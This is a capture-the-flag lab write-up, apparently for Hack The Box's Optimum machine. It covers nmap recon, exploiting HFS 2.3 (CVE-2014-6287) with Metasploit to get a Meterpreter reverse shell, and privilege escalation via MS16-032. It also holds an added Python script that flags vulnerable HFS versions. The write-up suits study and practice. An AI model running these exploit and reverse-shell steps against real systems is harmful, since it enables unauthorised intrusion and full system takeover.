Recon
Nmap scan
With nmap we find only one open port (80), which points to a web server.
# basic scan
nmap -sC -sV -p- -T5 10.10.10.8
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Website
We browse the website and, as identified by the nmap scan, find an HFS (HttpFileServer) server, version 2.3.
Vulnerabilities
We search for vulnerabilities on exploit-db and in Metasploit.
# exploitdb
searchsploit HFS 2.3
HFS (HTTP File Server) 2.3.x - Remote Command Execution
# msfconsole
msf6 > search HFS 2.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
We find a well-known vulnerability: rejetto_hfs_exec. Let's try to get access to the server!
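As an added example (not part of the original writeup), a small Python triage script that pulls the HFS version out of the nmap service line or the HTTP Server header and flags the 2.3 releases before 2.3c, the range Rejetto fixed for CVE-2014-6287; the sample scan text is constructed from the output above.

```python
import re
from typing import List, Optional, Tuple

# Version tuple: (major, minor, letter suffix), e.g. HFS 2.3b -> (2, 3, "b")
HfsVersion = Tuple[int, int, str]

# Matches the HTTP Server header ("HFS 2.3") and the nmap service
# line ("HttpFileServer httpd 2.3"); the letter suffix is optional.
_VERSION_RE = re.compile(
    r"(?:HFS|HttpFileServer(?:\s+httpd)?)\s+(\d+)\.(\d+)([a-z]?)\b",
    re.IGNORECASE,
)


def parse_hfs_version(text: str) -> Optional[HfsVersion]:
    """Extract the HFS version from a banner or nmap line, or None if absent."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), m.group(3).lower()


def affected_by_cve_2014_6287(version: HfsVersion) -> bool:
    """CVE-2014-6287 affects the 2.3 line before 2.3c (2.3, 2.3a, 2.3b)."""
    major, minor, suffix = version
    return (major, minor) == (2, 3) and suffix < "c"


def triage_nmap_output(nmap_output: str) -> List[Tuple[str, HfsVersion, bool]]:
    """Return (port, version, affected) for every open HFS service nmap reported."""
    findings = []
    for line in nmap_output.splitlines():
        m = re.match(r"\s*(\d+/(?:tcp|udp))\s+open\s+", line)
        version = parse_hfs_version(line)
        if m and version:
            findings.append((m.group(1), version, affected_by_cve_2014_6287(version)))
    return findings


# Constructed sample, modelled on the nmap output above (not a live scan).
SAMPLE_SCAN = """PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
"""

if __name__ == "__main__":
    for port, ver, hit in triage_nmap_output(SAMPLE_SCAN):
        label = "%d.%d%s" % ver
        print(port, "HFS", label, "affected by CVE-2014-6287" if hit else "not affected")
```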
Exploit
Entry point
We load the rejetto_hfs_exec module and run the exploit.
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.6:4444
[*] Using URL: http://10.10.16.6:8080/3D77WCI2aRHJnkl
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /3D77WCI2aRHJnkl
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (10.10.16.6:4444 -> 10.10.10.8:49213) at 2022-07-24 23:52:26 +0200
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\YSDfhnfRWto.vbs' on the target
C:\Users\kostas\Desktop> powershell.exe -c "whoami"
optimum\kostas
We are in! We are connected as the user kostas, so we can now get the user flag. Next we need to escalate privileges to get the admin flag.
We first check system information with the sysinfo command.
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
This is a Windows Server 2012 R2 host. With some research we find CVE-2016-0099, which allows a logged-on user to escalate privileges. We first search for a Metasploit module.
Privesc
msf6 > search CVE-2016-0099
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation
There is a module, so let's run the exploit! We first background our existing session.
# background the current session
meterpreter > background
# check our sessions
msf6 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows OPTIMUM\kostas @ OPTIMUM 10.10.16.6:4445 -> 10.10.10.8:49426 (10.10.10.8)
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
# configure options, don't forget to point to our session
msf6 > set session <ID session>
msf6 > exploit
C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
The privesc works! We now run as NT AUTHORITY\SYSTEM :)
Easy, External, HFS, Python, Penetration Tester Level 2, OS Command Injection, CVE-2014-6287, A03:2021-Injection, Network, CVE Exploitation, Public Vulnerabilities